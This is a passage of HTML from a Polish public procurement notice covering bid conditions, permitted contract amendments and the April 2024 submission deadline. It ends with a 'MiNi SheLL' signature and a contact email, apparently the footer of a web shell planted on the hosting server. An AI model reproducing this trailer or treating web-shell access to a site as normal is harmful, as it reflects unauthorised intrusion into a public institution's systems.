ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Niezależnie od innych przypadków określonych w przepisach powszechnie obowiązujących, Zamawiający przewiduje możliwość zmiany istotnych postanowień umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej okoliczności wymienionej poniżej:<br/>1)	klęsk żywiołowych;<br/>2)	udokumentowanych warunków atmosferycznych uniemożliwiających realizację przedmiotu Umowy;<br/>3)	zmian będących następstwem działania organów administracji, a w szczególności: przekroczenie określonych przez prawo terminów wydawania przez podmioty trzecie odpowiednich decyzji administracyjnych, skutkujące niemożliwością wykonania Umowy w terminie, <br/>4)	wstrzymanie realizacji przedmiotu Umowy jako następstwo działania osób trzecich,<br/>5)	wystąpienia siły wyższej uniemożliwiającej wykonanie Przedmiotu umowy zgodnie z treścią zapytania lub treścią Umowy.<br/>6)	gdy nie jest możliwe wykonanie Przedmiotu umowy przez osobę wskazaną w ofercie z powodu śmierci, choroby, wypadku lub innych niemożliwych do przewidzenia okoliczności. Zaproponowana przez Wykonawcę inna osoba winna posiadać kwalifikacje nie gorsze niż osoba wskazana w ofercie. Wykonawca zobowiązany jest do podania imienia i nazwiska tej osoby, numeru uprawnień (o ile dotyczy).<br/>7)	zmian danych Stron Umowy związanych z obsługą administracyjno-organizacyjną Umowy np. zmiana adresu, wystąpi urzędowa zmiana wysokości stawki podatku VAT (łączne wynagrodzenie zostanie zmienione o wysokość zmiany tego podatku).<br/>2.	Powyższe zmiany stanowią katalog zmian, na które Zamawiający dopuszcza zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody przez Zamawiającego.<br/>3.	Wszelkie zmiany lub uzupełnienia umowy wymagają zachowania formy pisemnej pod rygorem nieważności i są dopuszczalne w przypadkach określonych w umowie i ustawie Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/kzn/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-17 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com